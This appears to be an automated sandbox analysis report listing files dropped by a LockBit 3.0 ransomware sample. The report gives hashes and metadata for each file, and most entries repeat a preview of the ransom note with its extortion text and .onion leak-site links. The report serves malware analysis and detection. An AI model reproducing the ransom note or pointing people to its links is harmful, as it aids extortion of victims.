                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.981216184862354
                Encrypted:false
                SSDEEP:192:oWO+qC4wPJJoq21Bs0aQGxP72fDBas3/5f8DFDpepdo:2Wz43s0aHT278sP50DFDpe0
                MD5:BBE65B6529B808B97059E6BFAAC4A99B
                SHA1:F1AE596B546AF220FB529FDB1AA64B264537D1C2
                SHA-256:E6329F58ED9F05EBF71D8FD87285EF4BA357B29B83F314BB5401881CD55EDB3A
                SHA-512:A21F225514FA56BC6A2824D18637286EE685E2B3C608A49CD1CBB688E0315117C2A3EC2EA1309D9E7849BA618FCB473A1A37700A85689037F2CD67411FCA263B
                Malicious:false
                Preview:.....^n..P.........p......N......(.....W..?*....ZU.r....4...yl....G....c.u. .t.....P.^.BP..l.>.!......ct...C......Gs.G.......*7.d.{....l%.G...}.r.2mkF.Z...Z.....sc.......F..6. ...Q...."..e.uGM.f....4`/..MI..%R.9....;.pR)........hIC..jsJ.....w..V...Y..........I(..x.7.......}R.8......]e...o..^.L.Y...*,..K.?:.X-....<.>.lxR.....U..C.....k..7.!m..r.Jz6..`.re....q..L.Y,......].....X.s.;.q..D.5........+..<.....a.... V...i.....mf..V.wW..#]....#C..r.R.&.....1..\.r..w.'....6.?..O.,......Wl..@r=\...C..[..g.zT^.....I.v.;.'.P..d.M...G.+Z.C..)..^>1V..^.a.`.....'g6.P.R....al..y<......0..F..X>#.N...........E......f.Nv....q,./. t..;~....gZ%.X?r.|<.....e|..vE..O.=...`...B..s....()?....."..5F.d...p.j.7...kb}.M.[.u..W4......H...Vu..<...=?.p..6..f.........n~h.-"S.8.......I.s..#`..-.l.x./x|...E...ON.8.Z..a..P..W......E.<..v.F.i....E0....VywPMG....9X.H.M.$...O..,.kN.;M*sp.]3.5S.w'.~.-...-....".:.[..#U0..&......\X..U@.6.^v.q.t..O=5.Y.U]#.R#:Q.a.L..f..W

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

